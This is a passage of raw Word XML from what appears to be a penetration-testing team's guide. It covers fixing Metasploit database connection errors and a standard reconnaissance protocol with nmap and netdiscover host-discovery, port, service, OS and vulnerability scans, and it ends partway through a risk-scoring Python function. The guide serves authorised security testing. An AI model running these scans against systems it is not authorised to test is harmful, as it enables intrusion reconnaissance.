        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EACD1F8" w14:textId="77777777" w:rsidR="00854FAD" w:rsidRPr="00807D52" w:rsidRDefault="00854FAD" w:rsidP="00807D52"/>
    <w:p w14:paraId="0463472A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Use our pre-configured VirtualBox appliance available at [Link to shared drive]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FADC65C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Tool-Specific Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FA8C9" w14:textId="38F3D431" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Issue: "Metasploit Database Connection Failed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Last Updated: </w:t>
      </w:r>
      <w:r w:rsidR="00D136A6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7 November 202</w:t>
      </w:r>
      <w:r w:rsidR="00511E56">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Contributor: </w:t>
      </w:r>
      <w:r w:rsidR="00D21130">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Shimani Alfred Tlokotsi</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Verified: </w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201B207B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error Messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB9D318" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E41357" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>[*] Failed to connect to the database: could not connect to server: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6BF5A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-Step Resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA7DC3A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start PostgreSQL Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB872B7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E15A18F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE3C4F1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo systemctl enable postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53070ACC" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo systemctl status postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50360542" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Should show "active (running)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437483F3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initialize MSF Database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6EC59" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D601D4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10E048" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Follow prompts, default settings usually work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317901D3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verify Connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A47C310" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12F442" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383171B4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>msf6 &gt; db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3C541" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Should return "[*] postgresql connected to msf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1337AA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Common Pitfalls and Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B4190" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EEBC2" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># If port 5432 is in use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F473F07" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo netstat -tulpn | grep 5432</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49C94E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo kill [PID]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BCA667" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"/>
    <w:p w14:paraId="38489AEE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># If permission errors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C6A4F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo chown postgres:postgres /var/lib/postgresql/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E374E56" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated Fix Script:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:br/>
        <w:t>We created a bash script fix_metasploit_db.sh in our GitHub repo that automates these steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC519D4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 3: METHODOLOGY DOCUMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C92A9" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 Standardized Penetration Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34134386" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 1: Reconnaissance &amp; Scanning Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62123542" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-Scan Preparation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F920D0D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Documentation Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B9106" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C78333" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Create organized directory structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58010435" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>mkdir -p ~/pentest/[target-ip]/scans/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B4670" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>mkdir -p ~/pentest/[target-ip]/evidence/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9A00B7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>mkdir -p ~/pentest/[target-ip]/reports/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A5800" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Host Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AEEAF1" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4277EB9A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Identify live hosts on subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D965ACD" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>netdiscover -r 10.0.2.0/24 -i eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C261482" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># OR using nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BED953F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -sn 10.0.2.0/24 -oA ~/pentest/initial_discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24835972" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comprehensive Port Scan Protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B2FCC" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step A: Quick TCP Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E358697" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167934C3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -T4 -F [target-ip] -oA quick_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9D184" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># -T4: Aggressive timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F178308" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># -F: Fast mode (100 common ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A87B8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step B: Full Port Scan with Service Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305986E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B56DBC" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap -sS -sV -sC -O -p- [target-ip] -oA full_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F7A80" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># -sS: SYN stealth scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254B499F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># -sV: Service version detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54542E24" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># -sC: Default scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B0750" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t># -O: OS detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D45D54" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># -p-: All ports (1-65535)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D547B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step C: Vulnerability Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166EBAEB" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310580BF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>nmap --script vuln [target-ip] -oA vuln_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28DBC8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scan Analysis Checklist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29844A92" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Identify open ports (create spreadsheet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D7E62" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Document service versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13564A0C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Note banner information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70637D08" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Flag unusual configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C09178" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Compare with known vulnerability databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D998248" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Vulnerability Prioritization Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527EE42" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk Scoring Matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EC153E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7DF5C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Python script for automated risk scoring (simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40C595" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>def calculate_risk_score(vulnerability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E8B3F5" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    exploitability = vulnerability['exploit_available']  # 0-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4C74C6" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    impact = vulnerability['potential_damage']  # 0-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F28C7AA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    ease = vulnerability['complexity']  # 0-1 (inverse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A80A8CA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D813BF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    risk_score = (exploitability * 0.4) + (impact * 0.4) + (ease * 0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A2900" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983E20F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    if risk_score &gt;= 0.8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73841311" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">        return "CRITICAL"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC672B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">    elif risk_score &gt;= 0.6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6E96FE" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">        return "HIGH"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A354DC" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    elif risk_score &gt;= 0.4:</w:t>
      </w:r>
    </w:p>
